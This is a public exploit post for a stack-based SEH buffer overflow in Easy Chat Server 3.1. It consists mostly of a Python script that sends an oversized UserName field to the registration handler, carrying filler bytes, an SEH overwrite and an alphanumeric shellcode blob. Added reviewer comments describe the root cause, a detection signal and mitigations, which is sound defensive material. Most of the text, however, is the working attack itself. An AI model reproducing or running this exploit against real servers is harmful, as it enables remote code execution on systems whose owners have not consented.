
Easy Chat Server 3.1 Buffer Overflow

Posted on 13 June 2017

# Exploit Title: Easy Chat Server User Registration Buffer Overflow (SEH)
# Date: 09/10/2017
# Software Link: http://echatserver.com/ecssetup.exe
# Exploit Author: Aitezaz Mohsin
# Vulnerable Version: v2.0 to v3.1
# Vulnerability Type: Buffer Overflow
# Severity: Critical
# Tested on: [Windows XP Sp3 Eng]
# ======================================================================================================================
# Username parameter in Registration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability.
# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
# ======================================================================================================================
# USAGE: python exploit.py ip
#
# Reviewer notes (defensive reading of this public PoC, kept as posted):
# - Root cause, per the author's header: the UserName value submitted to
#   /registresult.htm is copied into a fixed-size stack buffer with no length
#   check. Any fix has to bound that copy (or reject over-long UserName values)
#   server-side; per-field length limits at a reverse proxy in front of the
#   service are a stop-gap. Host mitigations (SafeSEH/DEP on the binary) reduce
#   exploitability but do not remove the overflow.
# - Detection: a POST to /registresult.htm whose UserName field is several
#   hundred bytes long (this script sends well over 400 bytes of filler plus
#   the payload) is a strong, low-false-positive signal; the rest of the form
#   fields below are ordinary register.ghp parameters.
# - Offsets here are specific to the tested build/OS (v2.0-v3.1 on XP SP3 per
#   the header); they are not evidence about other versions.
# - The script is Python 2 (print statement). It reads sys.argv[1] unchecked,
#   so running it without an argument raises IndexError, and the Host/Referer
#   headers are hard-coded to 192.168.1.11 rather than following `ip`.
#!/usr/bin/python
import os
import sys
import socket

ip = sys.argv[1]
# NOTE: this rebinds the name `socket` from the module to the connected
# socket object; the module is not reachable by that name afterwards.
socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
socket.connect((ip , 80))

# AlphanumericShellcode -- payload string exactly as the author posted it; its
# behaviour is not analysed here.
shellcode = ("x89xe2xdaxdexd9x72xf4x59x49x49x49x49x49x43x43"
"x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41"
"x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42"
"x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50"
"x38x41x43x4ax4ax49x4bx4cx5ax48x4bx32x55x50x33"
"x30x35x50x43x50x4dx59x5ax45x36x51x4fx30x32x44"
"x4cx4bx30x50x50x30x4cx4bx51x42x54x4cx4cx4bx30"
"x52x44x54x4cx4bx44x32x36x48x34x4fx58x37x50x4a"
"x31x36x36x51x4bx4fx4ex4cx47x4cx43x51x33x4cx43"
"x32x46x4cx51x30x39x51x48x4fx34x4dx45x51x48x47"
"x4dx32x4cx32x50x52x56x37x4cx4bx31x42x42x30x4c"
"x4bx31x5ax47x4cx4cx4bx30x4cx54x51x42x58x4ax43"
"x47x38x35x51x48x51x36x31x4cx4bx46x39x37x50x55"
"x51x49x43x4cx4bx50x49x35x48x4bx53x57x4ax37x39"
"x4cx4bx50x34x4cx4bx53x31x38x56x56x51x4bx4fx4e"
"x4cx49x51x38x4fx44x4dx53x31x39x57x37x48x4bx50"
"x32x55x4ax56x43x33x43x4dx4cx38x57x4bx43x4dx31"
"x34x43x45x5ax44x46x38x4cx4bx31x48x51x34x33x31"
"x58x53x42x46x4cx4bx44x4cx30x4bx4cx4bx46x38x35"
"x4cx35x51x4ex33x4cx4bx45x54x4cx4bx43x31x4ex30"
"x4dx59x30x44x31x34x37x54x31x4bx51x4bx53x51x31"
"x49x50x5ax56x31x4bx4fx4dx30x51x4fx51x4fx50x5a"
"x4cx4bx35x42x5ax4bx4cx4dx51x4dx55x38x46x53x36"
"x52x35x50x55x50x45x38x32x57x32x53x30x32x51x4f"
"x56x34x33x58x30x4cx32x57x56x46x44x47x4bx4fx58"
"x55x4fx48x4cx50x35x51x43x30x43x30x37x59x4fx34"
"x50x54x50x50x32x48x37x59x4bx30x32x4bx55x50x4b"
"x4fx59x45x53x5ax33x38x50x59x50x50x5ax42x4bx4d"
"x51x50x36x30x31x50x36x30x45x38x4bx5ax54x4fx39"
"x4fx4bx50x4bx4fx38x55x4cx57x52x48x53x32x45x50"
"x44x51x31x4cx4bx39x4bx56x52x4ax52x30x50x56x56"
"x37x33x58x58x42x39x4bx46x57x55x37x4bx4fx39x45"
"x51x47x43x58x4fx47x4bx59x30x38x4bx4fx4bx4fx59"
"x45x51x47x42x48x54x34x5ax4cx57x4bx4bx51x4bx4f"
"x48x55x30x57x5ax37x42x48x32x55x52x4ex30x4dx45"
"x31x4bx4fx38x55x35x38x35x33x52x4dx45x34x45x50"
"x4bx39x4dx33x56x37x31x47x56x37x46x51x5ax56x32"
"x4ax44x52x56x39x31x46x5ax42x4bx4dx53x56x39x57"
"x30x44x51x34x57x4cx35x51x33x31x4cx4dx37x34x57"
"x54x32x30x58x46x35x50x51x54x50x54x30x50x31x46"
"x51x46x36x36x31x56x36x36x30x4ex36x36x51x46x31"
"x43x46x36x43x58x33x49x48x4cx47x4fx4bx36x4bx4f"
"x58x55x4cx49x4dx30x30x4ex36x36x47x36x4bx4fx56"
"x50x32x48x33x38x4cx47x35x4dx35x30x4bx4fx49x45"
"x4fx4bx4ax50x48x35x59x32x50x56x52x48x4fx56x5a"
"x35x4fx4dx4dx4dx4bx4fx58x55x37x4cx53x36x33x4c"
"x44x4ax4bx30x4bx4bx4dx30x33x45x45x55x4fx4bx37"
"x37x34x53x52x52x32x4fx53x5ax35x50x36x33x4bx4f"
"x4ex35x41x41")

# Over-long UserName value: 217 bytes of filler, two 4-byte values (presumably
# the SEH overwrite the title refers to -- not verified here), the payload,
# then 200 bytes of trailing padding. The 217 figure is the build-specific
# distance to the overwritten structure and is what a server-side length
# check on UserName would have to stay below.
magic = "B" * 217
magic += "xebx06x90x90"
magic += "xBCx04x01x10"
magic += shellcode
magic += "C" * 200

# Plain form POST to the registration handler; only UserName is oversized.
buffer = "POST /registresult.htm HTTP/1.1 "
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Referer: http://192.168.1.11/register.ghp"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"
buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"

socket.send(buffer)
# Reads at most one 4096-byte chunk of the response (Python 2 print statement).
data = socket.recv(4096)
print data
socket.close()

 
